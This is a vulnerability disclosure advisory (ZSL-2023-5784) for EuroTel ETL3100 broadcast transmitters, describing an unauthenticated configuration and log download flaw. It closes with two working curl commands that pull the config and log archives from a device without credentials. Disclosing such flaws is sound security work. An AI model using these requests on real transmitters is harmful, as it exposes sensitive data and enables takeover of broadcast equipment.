EuroTel ETL3100 Transmitter Information Disclosure

EuroTel ETL3100 Transmitter Unauthenticated Config/Log Download VulnerabilityVendor: EuroTel S.p.A. | SIEL, Sistemi Elettronici S.R.LProduct web page: https://www.eurotel.it | https://www.siel.fmAffected version: v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)                   v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)Summary: RF Technology For Television Broadcasting Applications.The Series ETL3100 Radio Transmitter provides all the necessaryfeatures defined by the FM and DAB standards. Two bands are providedto easily complain with analog and digital DAB standard. The SeriesETL3100 Television Transmitter provides all the necessary featuresdefined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, aswell as the analog TV standards. Three band are provided to easilycomplain with all standard channels, and switch softly from analog-TV'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.Desc: The TV and FM transmitter suffers from an unauthenticatedconfiguration and log download vulnerability. This will enablethe attacker to disclose sensitive information and help him inauthentication bypass, privilege escalation and full system access.Tested on: GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)           lighttpd/1.4.26           PHP/5.4.3           Xilinx Virtex MachineVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5784Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5784.php29.04.2023--$ curl http://192.168.2.166/cfg_download.php -o config.tgz$ curl http://192.168.2.166/exciter/log_download.php -o log.tar.gz